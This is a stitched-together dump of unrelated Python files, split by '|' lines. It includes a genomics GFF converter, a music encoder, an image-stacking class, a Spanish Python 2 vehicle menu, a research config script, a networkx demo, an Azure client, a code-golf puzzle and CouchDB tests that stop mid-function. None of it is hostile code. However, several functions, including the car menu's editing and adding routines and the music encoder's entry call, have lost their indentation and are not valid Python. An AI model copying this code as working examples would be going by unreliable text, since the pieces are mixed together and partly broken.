        elif argv[i].startswith( '-p=' ):
            try:
                numProc = int( argv[i][3:] )
            except ValueError:
                print( 'WARNING: number of processors must be integer...using default', NUMPROC )
                numProc = NUMPROC
            startInd += 1
        elif argv[i].startswith( '-' ):
            print( 'ERROR: {:s} is not a valid parameter...use -h for help'.format( argv[i] ) )
            exit()
    # end for i
    chrmFileStr = argv[startInd]
    # Everything after the chromosome-sizes file is a GFF input. (The unused
    # allCFileAr accumulator and the manual append loop were removed.)
    gffFileAr = argv[startInd+1:]
    processInputs( gffFileAr, chrmFileStr, keepTmp, outIdAr, searchTerm, numProc, isSort, isPrint )
def printHelp():
    """Print the command-line usage text."""
    # Each entry is printed on its own line; '' entries become blank lines.
    helpLines = (
        '',
        'Usage:\tpython3 gff_to_bigwig_pe_v3.py [-q] [-h] [-keep] [-sort] [-o=out_ids]\n\t[-p=num_proc] [-s=gff_search_term] <chrm_sizes> <gff_fille> [gff_file]*',
        '',
        'Converts GFF files to context-specific BigWig files',
        'Note: bedGraphToBigWig and bedSort programs must be in the path',
        '',
        'Required:',
        'chrm_file\ttab-delimited file with chromosome names and lengths,\n\t\ti.e. fasta index file',
        'gff_file\tgff file with 4mC and/or 6mA positions on all chrms',
        '',
        'Optional:',
        '-keep\t\tkeep intermediate files',
        '-sort\t\tcalls bedSort; add this option if bigwig conversion fails',
        '-s=gff_search\tGFF attribute which has methylation level\n\t\t[default "frac"]',
        '-o=out_id\toptional ID for output files [default from input file name]\n\t\tif one ID specified, applied to all input GFFs\n\t\tcomma-separated list IDs for multiple GFFs',
        '-p=num_proc\tnumber of processors to use [default 1]',
    )
    for line in helpLines:
        print( line )
if __name__ == "__main__":
    # Require at least a chromosome-sizes file and one GFF file.
    if len(sys.argv) >= 3:
        parseInputs( sys.argv[1:] )
    else:
        printHelp()
|
# soggetto.py
import re
import time
from sound import audio_sequence
SOLFEGE_MAP = {
'a': 'fa',
'e': 're',
'i': 'mi',
'o': 'sol',
'u': 'ut'
}
NOTE_MAP = {
'a': 'F',
'e': 'D',
'i': 'E',
'o': 'C',
'u': 'G'
}
def encode_string(text):
    """Encode *text* as music with the 16th-century soggetto cavato method
    ('soggetto cavato dalle vocali di queste parole').

    Parameters:
        text (str): The text to encode in music.

    Returns:
        solfege (list(str)): Solfege syllables for each vowel in the text.
        notes (list(str)): Note names for each vowel (e.g. 'C').
    """
    # Keep only the vowels, lower-cased, in order of appearance.
    vowels = [ch for ch in text.lower() if ch in SOLFEGE_MAP]
    solfege = [SOLFEGE_MAP[ch] for ch in vowels]
    notes = [NOTE_MAP[ch] for ch in vowels]
    return solfege, notes
def main():
    """Accept user input, encode it, export the corresponding audio
    and print the encoding to console.
    """
    text = input('Please enter text to be encoded:\n')
    solfege, notes = encode_string(text)
    # audio_sequence (project module `sound`) turns note names into audio
    audio = audio_sequence(notes)
    # export audio under a timestamped name
    # NOTE(review): assumes an 'audio/' directory already exists — confirm,
    # export will fail otherwise.
    fname = f'soggetto_cavato_{time.strftime("%Y%m%d-%H%M%S")}.wav'
    audio.export(f'audio/{fname}')
    # print encoding
    print('Solfege:', ' '.join(solfege))
    print('Notes', ' '.join(notes))
if __name__ == '__main__':
main()
|
import numpy as np
import numpy.ma as ma
import os
from PIL import Image
from skimage.transform import rotate
class ImageStack:
    """A stack of aligned image frames: a float image accumulator plus a
    per-pixel count of how many frames contributed to each pixel.

    Arrays are indexed (x, y, channel); `samples` is (x, y). Helpers cover
    building stacks from files or pre-loaded frames, normalization,
    cropping, tone adjustments and saving.
    """

    def __init__(self, image, samples):
        # image: (width, height, channels) float accumulator
        # samples: (width, height) per-pixel contribution count
        self.image = image
        self.samples = samples

    @classmethod
    def create_average_frame(cls, directory, files, color_mode):
        """Return the per-pixel mean of *files*, clipped to [0, 255].

        NOTE(review): *directory* is unused (the file list already carries
        usable paths); kept for interface compatibility.
        """
        frame_0 = cls._load_frame(files[0], dtype=np.int32, color_mode=color_mode)
        width, height, channels = frame_0.shape
        image = np.zeros((width, height, channels), dtype=float)
        for filename in files:
            frame = cls._load_frame(filename, dtype=float, color_mode=color_mode)
            image[:, :, :] += frame
        image /= float(len(files))
        image = np.clip(image, 0.0, 255.0)
        return image

    @classmethod
    def from_files(cls, directory, files, offsets, color_mode, master_dark, master_flat):
        """Stack frames using a dict mapping file basename to (x, y) pixel
        offsets; optional dark/flat calibration frames are applied per frame.
        """
        # old method which is using a dict mapping file basename to x,y offsets (pixels)
        max_offset_x = int(max(x for x, _ in offsets.values()))
        min_offset_x = int(min(x for x, _ in offsets.values()))
        min_offset_y = int(min(y for _, y in offsets.values()))
        max_offset_y = int(max(y for _, y in offsets.values()))
        frame_0 = cls._load_frame(files[0], dtype=np.int32, color_mode=color_mode)
        width, height, channels = frame_0.shape
        # pad the output canvas so every shifted frame fits
        output_width = width + abs(min_offset_x) + abs(max_offset_x)
        output_height = height + abs(min_offset_y) + abs(max_offset_y)
        image = np.zeros((output_width, output_height, channels), dtype=float)
        samples = np.zeros((output_width, output_height), dtype=np.int16)
        for filename in files:
            filename = os.path.basename(filename)
            offset_x, offset_y = offsets[filename]
            filepath = os.path.join(directory, filename)
            frame = cls._load_frame(filepath, dtype=float, color_mode=color_mode)
            if master_dark is not None:
                frame -= master_dark
            if master_flat is not None:
                frame /= master_flat
            x = int(offset_x) + abs(min_offset_x)
            y = int(offset_y) + abs(min_offset_y)
            image[x:x+width, y:y+height, :] += frame
            samples[x:x+width, y:y+height] += 1
        return ImageStack(image, samples)

    @classmethod
    def stack_frames(cls, frames, color_mode, master_dark, master_flat):
        """Stack frame objects (with .filepath, .pixel_offset, .angle),
        rotating each frame and averaging by fractional per-pixel coverage.
        """
        max_offset_x = max(frame.pixel_offset[0] for frame in frames)
        max_offset_y = max(frame.pixel_offset[1] for frame in frames)
        frame_0 = cls._load_frame(frames[0].filepath, dtype=np.int32, color_mode=color_mode)
        width, height, channels = frame_0.shape
        output_width = width + max_offset_x
        output_height = height + max_offset_y
        image = np.zeros((output_width, output_height, channels), dtype=float)
        samples = np.zeros((output_width, output_height), dtype=float)
        for frame in frames:
            frame_image = cls._load_frame(frame.filepath, dtype=float, color_mode=color_mode)
            # coverage mask rotated with the frame so edge pixels count fractionally
            samples_image = np.ones((width, height), dtype=float)
            if master_dark is not None:
                frame_image -= master_dark
            if master_flat is not None:
                frame_image /= master_flat
            frame_image = rotate(frame_image, frame.angle)
            samples_image = rotate(samples_image, frame.angle)
            x, y = frame.pixel_offset
            image[x:x+width, y:y+height, :] += frame_image
            samples[x:x+width, y:y+height] += samples_image
        # average each channel, leaving uncovered pixels at zero
        for channel in range(channels):
            c = image[:, :, channel]
            image[:, :, channel] = np.divide(c, samples, out=np.zeros_like(c), where=samples != 0)
        return ImageStack(image, samples)

    @classmethod
    def stack_frames_inmem(cls, frames, color_mode, master_dark, master_flat):
        """Stack frames with sigma clipping: pixels deviating more than
        3 sigma from a sampled mean are masked out of the accumulation.
        """
        # pixel scale seems to differ a little between frames, must average
        pixel_scales = [frame.pixel_scale for frame in frames]
        average_pixel_scale_aspp = sum(pixel_scales) / len(pixel_scales)
        reference_frame = frames[0]
        offsets = {
            frame: frame.get_pixel_offset(reference_frame, average_pixel_scale_aspp)
            for frame in frames
        }
        max_offset_x = int(max(x for x, _ in offsets.values()))
        min_offset_x = int(min(x for x, _ in offsets.values()))
        min_offset_y = int(min(y for _, y in offsets.values()))
        max_offset_y = int(max(y for _, y in offsets.values()))
        frame_0 = cls._load_frame(frames[0].filepath, dtype=np.int32, color_mode=color_mode)
        width, height, channels = frame_0.shape
        output_width = width + abs(min_offset_x) + abs(max_offset_x)
        output_height = height + abs(min_offset_y) + abs(max_offset_y)
        num_frames = len(frames)
        # Create avg and std images based on a sample of up to 100 frames.
        # BUG FIX: the stack used to be allocated with num_frames slots while
        # only the first 100 were filled, so with >100 frames the statistics
        # were diluted by all-zero slots.
        sample_count = min(num_frames, 100)
        stack = np.zeros((sample_count, output_width, output_height, channels), dtype=float)
        for frame_index, frame in enumerate(frames[:sample_count]):
            offset_x, offset_y = offsets[frame]
            frame_image = cls._load_frame(frame.filepath, dtype=float, color_mode=color_mode)
            if master_dark is not None:
                frame_image -= master_dark
            if master_flat is not None:
                frame_image /= master_flat
            frame_image = rotate(frame_image, frame.angle)
            x = int(offset_x) + abs(min_offset_x)
            y = int(offset_y) + abs(min_offset_y)
            stack[frame_index, x:x+width, y:y+height, :] = frame_image
        average_image = np.average(stack, axis=0)
        stddev_image = np.std(stack, axis=0)
        # load all frames, apply average/stddev filter, and build output image progressively
        image = np.zeros((output_width, output_height, channels), dtype=float)
        samples = np.zeros((output_width, output_height), dtype=np.int16)
        for frame_index, frame in enumerate(frames):
            offset_x, offset_y = offsets[frame]
            frame_image = cls._load_frame(frame.filepath, dtype=float, color_mode=color_mode)
            frame_samples = np.ones((width, height), dtype=np.int16)
            if master_dark is not None:
                frame_image -= master_dark
            if master_flat is not None:
                frame_image /= master_flat
            frame_image = rotate(frame_image, frame.angle)
            frame_samples = rotate(frame_samples, frame.angle)
            x = int(offset_x) + abs(min_offset_x)
            y = int(offset_y) + abs(min_offset_y)
            # mask pixels deviating more than max_dev sigma from the sampled mean
            # NOTE(review): frame_image (width x height) is compared against the
            # full-canvas average/stddev images; the shapes only broadcast when
            # they coincide (zero padding) — confirm intended.
            max_dev = 3
            mask = (stddev_image * max_dev) < np.abs(frame_image - average_image)
            frame_image_ma = ma.array(frame_image, mask=mask)
            image[x:x+width, y:y+height, :] += frame_image_ma
            samples[x:x+width, y:y+height] += frame_samples.astype(np.int16)
        return ImageStack(image, samples)

    @classmethod
    def from_frames_old(cls, frames, offsets):
        """Stack pre-loaded frame arrays given a parallel sequence of offsets."""
        max_offset_x = int(max(x for x, _ in offsets))
        min_offset_x = int(min(x for x, _ in offsets))
        min_offset_y = int(min(y for _, y in offsets))
        max_offset_y = int(max(y for _, y in offsets))
        width, height, channels = frames[0].shape
        output_width = width + abs(min_offset_x) + abs(max_offset_x)
        output_height = height + abs(min_offset_y) + abs(max_offset_y)
        image = np.zeros((output_width, output_height, channels), dtype=float)
        samples = np.zeros((output_width, output_height), dtype=np.int16)
        for frame, (offset_x, offset_y) in zip(frames, offsets):
            x = int(offset_x) + abs(min_offset_x)
            y = int(offset_y) + abs(min_offset_y)
            image[x:x+width, y:y+height, :] += frame
            samples[x:x+width, y:y+height] += 1
        return ImageStack(image, samples)

    @staticmethod
    def _get_sharpness(xyc_image):
        """Mean gradient magnitude of the channel-summed image (higher = sharper)."""
        xy_image = np.sum(xyc_image, axis=2)
        gy, gx = np.gradient(xy_image)
        gnorm = np.sqrt(gx**2 + gy**2)
        return np.average(gnorm)

    @staticmethod
    def _load_frame(filename, dtype, color_mode='rgb'):
        """Load an image file as an (x, y, channel) array.

        color_mode selects a single channel ('r'/'g'/'b'), a luma conversion
        ('grey'), or the full image (default); it is ignored for images that
        are single-channel to begin with.
        """
        pil_image = Image.open(filename)
        np_image = np.asarray(pil_image, dtype=dtype)
        if np_image.ndim == 3:
            xyc_image = np.transpose(np_image, (1, 0, 2))
        else:
            grayscale_image = np.transpose(np_image, (1, 0))
            # NOTE(review): only the grayscale path flips vertically — confirm
            # the asymmetry with the color path is intentional.
            grayscale_image = np.flipud(grayscale_image)
            xyc_image = np.expand_dims(grayscale_image, axis=2)
            # color mode does not make sense if image is grayscale from the start
            return xyc_image
        if color_mode == 'r':
            xyc_image = np.expand_dims(xyc_image[:, :, 0], axis=2)
        elif color_mode == 'g':
            xyc_image = np.expand_dims(xyc_image[:, :, 1], axis=2)
        elif color_mode == 'b':
            xyc_image = np.expand_dims(xyc_image[:, :, 2], axis=2)
        elif color_mode == 'grey':
            # weighted luma conversion
            grayscale_image = xyc_image[:, :, 0] * 0.21 + xyc_image[:, :, 1] * 0.72 + xyc_image[:, :, 2] * 0.07
            xyc_image = np.expand_dims(grayscale_image, axis=2)
        return xyc_image

    def normalize(self):
        """Rescale each channel independently to [0, 1]; all-zero channels
        are skipped, constant channels are shifted to zero."""
        for channel in range(self.image.shape[2]):
            min_value = np.amin(self.image[:, :, channel])
            max_value = np.amax(self.image[:, :, channel])
            if max_value == 0:
                print(f'Skipping channel {channel} in normalization')
                continue
            print(f'Normalizing channel {channel}, min={min_value:.1f}, max={max_value:.1f}')
            if max_value > min_value:
                self.image[:, :, channel] = (self.image[:, :, channel] - min_value) / (max_value - min_value)
            else:
                self.image[:, :, channel] = (self.image[:, :, channel] - min_value)

    def crop(self, cx, cy, r):
        """Crop image and samples to the square of radius *r* centred on (cx, cy)."""
        self.image = self.image[cx-r:cx+r, cy-r:cy+r, :]
        self.samples = self.samples[cx-r:cx+r, cy-r:cy+r]

    def auto_crop(self, min_samples=None, inset=50):
        """Crop to the bounding box of pixels with at least *min_samples*
        contributing frames, shrunk by *inset* pixels on each side.

        BUG FIX: the old default min_samples=None made the `>=` comparison
        raise a TypeError; None now means "any covered pixel" (threshold 1).
        """
        if min_samples is None:
            min_samples = 1
        width, height = self.samples.shape
        min_x, max_x, min_y, max_y = None, None, None, None
        for x in range(width):
            for y in range(height):
                if self.samples[x, y] >= min_samples:
                    # BUG FIX: the old `min(min_x or x, x)` treated a
                    # legitimate bound of 0 as "unset" and could lose it.
                    min_x = x if min_x is None else min(min_x, x)
                    max_x = x if max_x is None else max(max_x, x)
                    min_y = y if min_y is None else min(min_y, y)
                    max_y = y if max_y is None else max(max_y, y)
        # NOTE(review): if no pixel qualifies the bounds stay None and the
        # arithmetic below raises, same as the original behavior.
        min_x += inset
        min_y += inset
        max_x -= inset
        max_y -= inset
        print(f'Cropping image to x=[{min_x},{max_x}], y=[{min_y},{max_y}]')
        self.image = self.image[min_x:max_x+1, min_y:max_y+1, :]
        self.samples = self.samples[min_x:max_x+1, min_y:max_y+1]

    def apply_gamma(self, gamma):
        """Apply a power-law tone curve (image assumed in [0, 1])."""
        self.image = np.power(self.image, gamma)

    def apply_function(self, f):
        """Apply an arbitrary scalar function element-wise to the image."""
        self.image = np.vectorize(f)(self.image)

    def invert(self):
        """Invert tones (image assumed in [0, 1])."""
        self.image = 1.0 - self.image

    def save(self, filename):
        """Write the image as an 8-bit RGB file (image assumed in [0, 1])."""
        out_image = (255.0 * self.image)
        yxc_image = np.transpose(out_image, (1, 0, 2))
        # BUG FIX: np.int8 wraps values above 127 to negative numbers,
        # corrupting the bright half of the range; 8-bit image data is uint8.
        yxc_image = yxc_image.astype(np.uint8)
        if yxc_image.shape[2] == 1:
            # expand image to three equal channels
            expanded_image = np.zeros((yxc_image.shape[0], yxc_image.shape[1], 3), dtype=np.uint8)
            expanded_image[:, :, 0] = yxc_image[:, :, 0]
            expanded_image[:, :, 1] = yxc_image[:, :, 0]
            expanded_image[:, :, 2] = yxc_image[:, :, 0]
            yxc_image = expanded_image
        pil_image = Image.fromarray(yxc_image, mode='RGB')
        pil_image.save(filename)

    def save_samples_map(self, filename, num_shades=8):
        """Write the per-pixel sample counts as a grayscale coverage map.

        NOTE(review): counts above num_shades overflow uint8 after scaling —
        confirm inputs stay within range.
        """
        out_image = self.samples * (256.0 / num_shades)
        yx_image = np.transpose(out_image, (1, 0))
        yx_image = yx_image.astype(np.uint8)
        pil_image = Image.fromarray(yx_image, mode='L')
        pil_image.save(filename)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
__autor__='Angel Alvarez'
from vehicle_model import Vehicle
from car_model import Car
def saliendo():
    # Farewell banner shown when the user quits; raw_input pauses until the
    # user presses a key (Python 2 script: bare `print` emits a blank line).
    print
    print "Gracias por usar GestiCar Soft."
    raw_input("Cerrando. Pulse cualquier tecla..")
def desea_salir(salir):
    """Return True when the user's answer means quit ('s' or 'S')."""
    return salir in ('s', 'S')
def es_opcion(opc):
    """Return True when *opc* is one of the valid menu options 1, 2 or 3."""
    return opc in (1, 2, 3)
def es_si_o_es_no(opc):
    """Tri-state yes/no answer: True for 's'/'S', False for 'n'/'N',
    None for anything else."""
    if opc in ('s', 'S'):
        return True
    if opc in ('n', 'N'):
        return False
    return None
def es_numero(num):
    """Return True when *num* parses as an integer, False otherwise."""
    try:
        int(num)
    except ValueError:
        return False
    return True
def dame_el_numero(opc):
    """Parse *opc* as an int; return -1 when it is not numeric."""
    try:
        return int(opc)
    except ValueError:
        return -1
def muestra_menu():
    # Show the main menu and return the raw user answer (a string;
    # 'S'/'s' means quit, '1'-'3' select an action).
    print
    print "Seleccione una opción:"
    print "1.-Listar vehículos."
    print "2.-Editar kilómetros y fecha ITV."
    print "3.-Añadir vehículo."
    print "Pulse 'S' para salir."
    print
    return raw_input("¿Que opción desea?: ")
def dame_atributos(indice):
    """Return the display name of the vehicle attribute at *indice* (0-4),
    or None for any other index."""
    nombres = {
        0: "Marca",
        1: "Modelo",
        2: "Tipo vehiculo",
        3: "Kms",
        4: "ITV",
    }
    return nombres.get(indice)
def listar_vehiculos(cars):
    # Print every vehicle with its list index; the index doubles as the
    # selection ID used by editar_vehiculos.
    for indice, coches in enumerate(cars):
        print "ID: " + str(indice)
        print coches.get_full_vehicle()
        print coches.get_full_car()
        print
    if not cars:
        print "No existen vehículos."
def editar_vehiculos(cars):
listar_vehiculos(cars)
es_todo_correcto = False
while not es_todo_correcto:
edit_opcion = raw_input("Seleccione el vehiculo: ")
if es_numero(edit_opcion):
if not dame_el_numero(edit_opcion) >= len(cars):
vehiculo_seleccionado = cars[dame_el_numero(edit_opcion)]
es_todo_correcto = True
else:
print "No ha seleccionado correctamente un vehiculo."
else:
print "No es correcto."
es_todo_correcto = False
print
print "Vehiculo seleccionado: {}".format(vehiculo_seleccionado.get_full_vehicle())
while not es_todo_correcto:
actualizar_kms = raw_input("Introduzca los kilometros del vehiculo: ")
if es_numero(actualizar_kms):
vehiculo_seleccionado.kms_realizados = actualizar_kms
es_todo_correcto = True
else:
print "Error al introducir los datos."
es_todo_correcto = False
while not es_todo_correcto:
actualizar_ITV = raw_input("Introduzca la proxima revision tecnica (ITV): ")
if es_numero(actualizar_ITV):
vehiculo_seleccionado.itv = actualizar_ITV
es_todo_correcto = True
else:
print "Error al introducir los datos."
print
print "Kilometros e ITV actualizados."
def alta_nuevo_coche(cars):
print "Añadir un vehiculo: "
n_marca = raw_input("Introduzca la marca del vehiculo: ")
n_modelo = raw_input("Introduzca el modelo del vehiculo: ")
n_tipo = raw_input("Introduzca el tipo de vehiculo ('Turismo/Furgoneta/Motocicleta'): ")
es_nuevo = raw_input("¿El vehiculo está adquirido como nuevo? ('S'/'N'): ")[0]
es_nuevo.upper()
if es_si_o_es_no(es_nuevo):
n_kms = 0
else:
n_kms = raw_input("Introduzca los kilometros del vehiculo: ")
todo_correcto = False
while not todo_correcto:
n_itv = raw_input("Introduzca el año de compra del vehiculo: ")
if es_numero(n_itv):
itv = dame_el_numero(n_itv) + 4
todo_correcto = True
else:
print "El año no es correcto."
nuevo_vehiculo = Car(n_kms, itv, n_marca, n_modelo, n_tipo)
cars.append(nuevo_vehiculo)
print "Añadido nuevo vehiculo."
def main():
    # Seed data so the menu has something to list/edit.
    car2 = Car(53232, 2019, "Seat", "Alhambra", "Turismo")
    car3 = Car(215000, 2019, "VW", "Golf IV", "Turismo")
    car4 = Car(0, 2023, "BMW", "Serie 2 Gran Tourer", "Turismo")
    cochazos = [car2, car3, car4]
    opcion = False
    salir = False
    # Main menu loop: only the first character of the user's answer is used.
    while not salir:
        opcion = muestra_menu()[0]
        if es_numero(opcion):
            if es_opcion(dame_el_numero(opcion)):
                la_opcion = dame_el_numero(opcion)
                if la_opcion == 1:
                    listar_vehiculos(cochazos)
                elif la_opcion == 2:
                    editar_vehiculos(cochazos)
                elif la_opcion == 3:
                    alta_nuevo_coche(cochazos)
                elif la_opcion == -1:
                    # NOTE(review): unreachable — es_opcion() only accepts 1-3.
                    print "Lo siento, la opcion no es validad."
            else:
                print "Seleccione una opcion valida."
        elif desea_salir(opcion):
            saliendo()
            salir = True
        else:
            print "La opción no es correcta."
if __name__ == "__main__":
    main()
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main file used for approxNN project."""
import warnings
from absl import app
from absl import flags
from invariant_explanations import config
from invariant_explanations import other
from invariant_explanations import utils
FLAGS = flags.FLAGS
_RANDOM_SEED = flags.DEFINE_integer(
'random_seed',
42,
'The seed used for all numpy random operations.',
)
_DATASET = flags.DEFINE_string(
'dataset',
'cifar10',
'The dataset, chosen from config.ALLOWABLE_DATASETS.',
)
_EXPLANATION_TYPE = flags.DEFINE_string(
'explanation_type',
'ig',
'The explanation method, chosen from config.ALLOWABLE_EXPLANATION_METHODS.',
)
_RUN_ON_TEST_DATA = flags.DEFINE_boolean(
'run_on_test_data',
False,
'The flag used to specify whether or not to run on sample test data.',
)
_NUM_BASE_MODELS = flags.DEFINE_integer(
'num_base_models',
30000,
'The number of base models to load from the CNN Zoo.',
)
_NUM_SAMPLES_PER_BASE_MODEL = flags.DEFINE_integer(
'num_samples_per_base_model',
32,
'The number of sample images to use per base model.',
)
_NUM_SAMPLES_TO_PLOT_TE_FOR = flags.DEFINE_integer(
'num_samples_to_plot_te_for',
8,
'The number of samples for which to plot treatment effects.',
)
_KEEP_MODELS_ABOVE_TEST_ACCURACY = flags.DEFINE_float(
'keep_models_above_test_accuracy',
0.55,
'The threshold to use when select models from the CNN Zoo.',
)
_USE_IDENTICAL_SAMPLES_OVER_BASE_MODELS = flags.DEFINE_boolean(
'use_identical_samples_over_base_models',
True,
'A flag indicating whether or not to use identical samples on base models.',
)
_MODEL_BATCH_COUNT = flags.DEFINE_integer(
'model_batch_count',
100,
'A total number of model batches to use (from a total of num_base_models).',
)
_MODEL_BATCH_IDX = flags.DEFINE_integer(
'model_batch_idx',
1,
'The index of the batch of models to use for analysis.',
)
warnings.simplefilter('ignore')
def main(argv):
    """Entry point: copy CLI flag values into the shared config, create the
    output folders, and preprocess the CNN Zoo model data."""
    if len(argv) > 1:
        raise app.UsageError('Too many command-line arguments.')
    # Update config file defaults if the arguments are passed in via the cmd line.
    config.cfg.set_config_paths({
        'RANDOM_SEED': _RANDOM_SEED.value,
        'DATASET': _DATASET.value,
        'EXPLANATION_TYPE': _EXPLANATION_TYPE.value,
        'RUN_ON_TEST_DATA': _RUN_ON_TEST_DATA.value,
        'NUM_BASE_MODELS': _NUM_BASE_MODELS.value,
        'NUM_SAMPLES_PER_BASE_MODEL': _NUM_SAMPLES_PER_BASE_MODEL.value,
        'NUM_SAMPLES_TO_PLOT_TE_FOR': _NUM_SAMPLES_TO_PLOT_TE_FOR.value,
        'KEEP_MODELS_ABOVE_TEST_ACCURACY': _KEEP_MODELS_ABOVE_TEST_ACCURACY.value,
        'USE_IDENTICAL_SAMPLES_OVER_BASE_MODELS': (
            _USE_IDENTICAL_SAMPLES_OVER_BASE_MODELS.value
        ),
        'MODEL_BATCH_COUNT': _MODEL_BATCH_COUNT.value,
        'MODEL_BATCH_IDX': _MODEL_BATCH_IDX.value,
    })
    utils.create_experimental_folders()
    # Only the preprocessing stage is active; the commented calls below are
    # other pipeline stages kept for manual/selective runs.
    # utils.analyze_accuracies_of_base_models()
    utils.process_and_resave_cnn_zoo_data(
        config.cfg.RANDOM_SEED,
        other.get_model_wireframe(),
        config.cfg.COVARIATES_SETTINGS,
    )
    # utils.plot_treatment_effect_values()
    # utils.train_meta_model_over_different_setups(config.cfg.RANDOM_SEED)
    # utils.save_heat_map_of_meta_model_results()
    # utils.process_per_class_explanations(config.cfg.RANDOM_SEED)
    # utils.measure_prediction_explanation_variance(config.cfg.RANDOM_SEED)
if __name__ == '__main__':
    app.run(main)
|
"""
======================
Random Geometric Graph
======================
Example
"""
import matplotlib.pyplot as plt
import networkx as nx
G = nx.random_geometric_graph(200, 0.125)
# position is stored as node attribute data for random_geometric_graph
pos = nx.get_node_attributes(G, "pos")
# find node near center (0.5,0.5)
dmin = 1
ncenter = 0
for n in pos:
    x, y = pos[n]
    # squared Euclidean distance to the centre (no sqrt needed for argmin)
    d = (x - 0.5) ** 2 + (y - 0.5) ** 2
    if d < dmin:
        ncenter = n
        dmin = d
# color by path length from node near center
p = dict(nx.single_source_shortest_path_length(G, ncenter))
plt.figure(figsize=(8, 8))
nx.draw_networkx_edges(G, pos, nodelist=[ncenter], alpha=0.4)
# Node colour encodes hop distance from the centre node; unreachable nodes
# are absent from p and therefore not drawn.
nx.draw_networkx_nodes(
    G,
    pos,
    nodelist=list(p.keys()),
    node_size=80,
    node_color=list(p.values()),
    cmap=plt.cm.Reds_r,
)
# positions are in the unit square; pad the axes slightly
plt.xlim(-0.05, 1.05)
plt.ylim(-0.05, 1.05)
plt.axis("off")
plt.show()
|
from typing import AsyncGenerator, Any, Optional
from .base_client import AzureBaseClient
class AzureResourceManagerClient(AzureBaseClient):
    """Client scoped to the Microsoft.Resources provider of one resource group.

    Builds the ARM base URL for the given subscription and resource group and
    defaults the api-version query parameter to 2021-04-01 unless the caller
    already supplied one in kwargs['params'].
    """
    def __init__(self, subscription_id: str, resource_group_name: str, **kwargs):
        # Inject a default api-version without clobbering caller-supplied params.
        if 'params' not in kwargs:
            kwargs['params'] = {}
        params = kwargs['params']
        if 'api-version' not in params:
            params['api-version'] = '2021-04-01'
        super().__init__(f'https://management.azure.com/subscriptions/{subscription_id}/resourceGroups/{resource_group_name}/providers/Microsoft.Resources',
                         **kwargs)
    async def list_deployments(self, filter: Optional[str] = None) -> AsyncGenerator[Any, None]:
        """List the resource group's deployments, optionally OData-filtered.

        NOTE(review): this ``async def`` *returns* the paged iterator instead
        of iterating it, so callers must write
        ``async for d in await client.list_deployments()``; confirm this is
        the intended calling convention (a plain ``def`` would drop the extra
        ``await``). ``filter`` shadows the builtin but is kept for API
        compatibility.
        """
        # https://docs.microsoft.com/en-us/rest/api/resources/deployments/list-by-resource-group
        params = {}
        if filter is not None:
            params['$filter'] = filter
        return self._paged_get('/deployments', params=params)
|
if __name__ == "__main__":
    # Code-golfed Advent-of-Code 2020 day 3: reads a grid from file "i" and
    # counts '#' cells along the slope right-3/down-1 using walrus
    # assignments inside a list comprehension. NOTE(review): the resulting
    # count is computed but never printed or stored — presumably inspected
    # interactively; main_debug below is the readable equivalent.
    (lambda i,n,x:[n:=n+1 for y in range(1,len(i))if(x:=(3+x)%len(i[0]))+1 and i[y][x]=='#'][-1])(open("i",'r').read().split('\n'),0,0)
    #
def main_debug(inp, D=1, R=3):
    """Count '#' cells hit while descending the newline-separated grid *inp*,
    moving R columns right per D rows down and wrapping horizontally."""
    rows = inp.split('\n')
    width = len(rows[0])
    hits = 0
    col = 0
    for row_index in range(0, len(rows), D):
        if rows[row_index][col] == '#':
            hits += 1
        col = (R + col) % width
    return hits
from src.ml_utils.config.config import Config, load_conf
from src.ml_utils.db.couchdb_helper import CouchDBHelper
from cloudant.client import CouchDB
import pytest
import os
DB_NAME = "test_db"
@pytest.fixture(scope="module")
def username():
    # CouchDB user name, injected via the USERNAME environment variable.
    return os.environ['USERNAME']
@pytest.fixture(scope="module")
def password():
    # CouchDB password, injected via the PASSWORD environment variable.
    return os.environ['PASSWORD']
@pytest.fixture(scope="module")
def url():
    # CouchDB server URL, injected via the URL environment variable.
    return os.environ['URL']
@pytest.fixture(scope="session", autouse=True)
def db_cleanup(request):
    """Session-wide fixture: returns a raw CouchDB client and guarantees the
    test document/database are removed and the client disconnected after the
    test session."""
    username = os.environ['USERNAME']
    password = os.environ['PASSWORD']
    url = os.environ['URL']
    client = CouchDB(username, password, url=url, connect=True)
    def remove_doc():
        # Best-effort removal of the document/database created by the tests.
        try:
            db = client[DB_NAME]
            test_conf = db['test_doc']
            test_conf.delete()
            client.delete_database(DB_NAME)
            print("Deleted")
        except KeyError:
            print("Nothing to deleted")
    def db_shutdown():
        # BUG FIX: clean up first, then drop the connection. The original
        # disconnected before remove_doc() and, worse, never registered this
        # function at all, leaking the client connection after the session.
        remove_doc()
        client.disconnect()
    request.addfinalizer(db_shutdown)
    return client
def test_create_database(username, password, url):
    # Smoke test: the helper can create, connect to and disconnect from the
    # shared test database.
    db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
    db_helper.create_database()
    db_helper.connect()
    db_helper.disconnect()
def test_save_config_file(username, password, url):
    """A validated config file can be stored as a new document."""
    conf_file = load_conf('conf.json', validate_config=True)
    data = conf_file.data
    assert data.name == "test"
    assert data.description == "Some text"
    assert data.train['batch_size'] == 128
    helper = CouchDBHelper(DB_NAME, username, password, url=url)
    helper.connect()
    helper.save("test_doc", conf_file)
    helper.disconnect()
def test_overwrite_config_file(username, password, url):
    """Re-saving an existing document requires overwrite=True; without it a
    FileExistsError must be raised.

    Fixes the original ``assert True, 'expected FileExistsError'`` which could
    never fail, so a missing exception went undetected.
    """
    conf_file = load_conf('conf.json', validate_config=True)
    c = conf_file.data
    assert c.name == "test"
    assert c.description == "Some text"
    assert c.train['batch_size'] == 128
    db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
    db_helper.connect()
    db_helper.save("test_doc", conf_file, overwrite=True)
    db_helper.disconnect()
    db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
    db_helper.connect()
    try:
        db_helper.save("test_doc", conf_file)
        # Saving without overwrite must not succeed.
        raise AssertionError('expected FileExistsError')
    except FileExistsError:
        pass
    db_helper.disconnect()
def test_load_config_file(username, password, url):
    """A stored document can be loaded and rebuilt into a Config object."""
